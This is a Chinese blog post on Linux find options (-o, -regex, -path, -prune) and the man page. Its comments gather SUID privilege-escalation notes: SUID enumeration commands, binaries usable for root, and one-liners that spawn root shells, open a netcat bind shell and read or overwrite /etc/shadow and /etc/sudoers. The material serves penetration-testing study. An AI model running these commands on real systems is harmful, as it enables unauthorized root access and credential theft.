=Start=
=find命令的-o/-regex选项=
标题虽然比较拗口,但功能比较实用,之前有用过,但是没有总结过,因此,在这里用一篇文章记录一下。
#需求:查找当前目录下所有的JPG和PNG类型的图片文件 #方法一 find -maxdepth 2 -type f \( -iname \*.jpg -o -iname \*.png \) #-maxdepth选项需要放在-type选项之前 find -maxdepth 2 -type f -mtime -7 \( '*.jpg' -o -name '*.png' \) #方法二 find -maxdepth 2 -iregex '.*\.\(jpg\|png\)$' #方法三 find -maxdepth 2 -regextype posix-extended -regex '.*\.(jpg|png)$'
参考链接:
- http://unix.stackexchange.com/questions/15308/how-to-use-find-command-to-search-for-multiple-extensions
- http://stackoverflow.com/questions/7190565/unix-find-multiple-file-types
=find命令的-path/-prune选项=
#looks for files we can write to that don't belong to us(注意其中-path选项之后的写法,带有通配符)
if [ "$thorough" = "1" ]; then
grfilesall=`find / -writable -not -user \`whoami\` -type f -not -path "/proc/*" -exec ls -al {} \; 2>/dev/null`
if [ "$grfilesall" ]; then
echo -e "\e[00;31mFiles not owned by user but writable by group:\e[00m\n$grfilesall" |tee -a $report 2>/dev/null
echo -e "\n" |tee -a $report 2>/dev/null
else
:
fi
fi
#list all world-writable files excluding /proc(『非』的另一种写法 -not)
if [ "$thorough" = "1" ]; then
wwfiles=`find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null`
if [ "$wwfiles" ]; then
echo -e "\e[00;31mWorld-writable files (excluding /proc):\e[00m\n$wwfiles" |tee -a $report 2>/dev/null
echo -e "\n" |tee -a $report 2>/dev/null
else
:
fi
else
:
fi
-path pattern
File name matches shell pattern pattern. The metacharacters do not treat `/' or `.' specially; so, for example,
find . -path "./sr*sc"
will print an entry for a directory called `./src/misc' (if one exists). To ignore a whole directory tree, use -prune rather than checking every file in the tree. For example, to skip the directory `src/emacs' and all files and directories under it, and print the names of the other files found, do something like this:
find . -path ./src/emacs -prune -o -print
Note that the pattern match test applies to the whole file name, starting from one of the start points named on the command line. It would only make sense to use an absolute path name here if the relevant start point is also an absolute path. This means that this command will never match any thing:
find bar -path /foo/bar/myfile -print
The predicate -path is also supported by HP-UX find and will be in a forthcoming version of the POSIX standard.
# -path 选项后面接的是一个"pattern",即模式匹配串,它的作用只是在最后判定是否打印(但已经进行了搜索操作);如果一开始就不想要搜索某个目录,请使用 -prune 选项,直接跳过搜索该目录,速度会更快,效率更高
-prune
True; if the file is a directory, do not descend into it. If -depth is given, false; no effect. Because -delete implies -depth, you cannot usefully use -prune and -delete together.
=EOF=
《 “Linux下用find命令一次查找多种类型的文件” 》 有 9 条评论
-prune:如果符合条件的是一个目录,则不进入目录进行查找。例子:
`
[root@localhost ~]# mkdir /etc/passs
[root@localhost ~]# touch /etc/passs/passwd
[root@localhost ~]# find /etc/ -name “pass*” -prune
/etc/passs
/etc/default/passwd
/etc/pam.d/passwd
/etc/passwd-
/etc/passwd
[root@localhost ~]# find /etc/ -name “pass*”
/etc/passs
/etc/passs/passwd
/etc/default/passwd
/etc/pam.d/passwd
/etc/passwd-
/etc/passwd
`
参考:
http://liwei.life/2016/07/11/find%E5%91%BD%E4%BB%A4%E8%AF%A6%E8%A7%A3/
删除一个目录下部分类型之外的所有文件的三种方法
https://linux.cn/article-7954-1.html
suid backdoor
`
# find / -perm -4000 -type f -print0 2>/dev/null | xargs -0 ls -lt
# find / -perm -4000 -user root -type f -print0 2>/dev/null | xargs -0 ls -lt
# 对于我们的模糊搜索要求来说,主要用 ‘-perm -mode’ 的形式,而不是 ‘-perm +mode’
`
https://null-byte.wonderhowto.com/how-to/hack-like-pro-finding-potential-suid-sgid-vulnerabilities-linux-unix-systems-0158373/
http://en.wikipedia.org/wiki/Setuid
http://joshrendek.com/2013/02/why-setuid-is-bad-and-what-you-can-do/
https://gist.githubusercontent.com/dergachev/7916152/raw/f2a89578d2dbb89f9726153117d10b6b5a49caec/setuid-root-backdoor.md
Linux命令find -perm使用方法
http://blog.csdn.net/zbszhangbosen/article/details/7528680
http://bbs.chinaunix.net/thread-442733-1-1.html
对SUID可提权Root Shell的探究
http://www.freebuf.com/articles/system/149118.html
https://pentestlab.blog/2017/09/25/suid-executables/
`
SUID是Linux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具来进行root提权。
已知的可以用来提权的Linux可执行文件有:
Ø Nmap
Ø Vim
Ø find
Ø Bash
Ø More
Ø Less
Ø Nano
Ø cp
`
DumpsterDiver – 用于分析大量各类型文件搜索硬编码密钥的工具
https://github.com/securing/DumpsterDiver
Fuzzy finder(fzf+vim) 使用全指南
https://keelii.com/2018/08/12/fuzzy-finder-full-guide/
https://github.com/junegunn/fzf
`
Fuzzy finder 是一款使用 GO 语言编写的交互式的 Unix 命令行工具。可以用来查找任何 列表 内容,文件、Git 分支、进程等。所有的命令行工具可以生成列表输出的都可以再通过管道 pipe 到 fzf 上进行搜索和查找。
优点:
Go 语言编写,编译完生成可执行文件没有任何依赖
搜索/查找速度飞快
功能全面/可视化界面体验很棒
周边插件丰富 (vim, tmux, fuzzy auto-completion)
`
A simple, fast and user-friendly alternative to ‘find’
https://github.com/sharkdp/fd
Tiny file search utility (bash)
https://github.com/rauchg/spot
`
# 用来学习 bash 编程是个不错的例子
Short & written in Bash: you can edit it easily to suit your liking.
Fast. Just find + grep + awk.
Searches most things by default instead of some known predefined extensions.
Ignores .git, .hg, .svn, devices and binary files.
`
Linux下利用SUID提权
https://mp.weixin.qq.com/s/UfPLm53gAlc_z28kH4OYHQ
`
nmap –interactive
nmap> !sh
sh-3.2# whoami
root
touch pentestlab
find pentestlab -exec whoami \;
find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;
vim.tiny /etc/shadow
vim.tiny
# Press ESC key
:set shell=/bin/sh
:shell
bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)
less /etc/passwd
more /home/pelle/myfile
使用 cp 覆盖 /etc/shadow
使用 mv 覆盖 /etc/shadow 或者/etc/sudoers
awk ‘BEGIN {system(“/bin/bash”)}’
man passwd
# perl
exec “/bin/bash”;
# python
import os
os.system(“/bin/bash”)
# tcpdump
echo $’id\ncat /etc/shadow’ > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
`
[…] Linux下用find命令一次查找多种类型的文件https://ixyzero.com/blog/archives/2510.html […]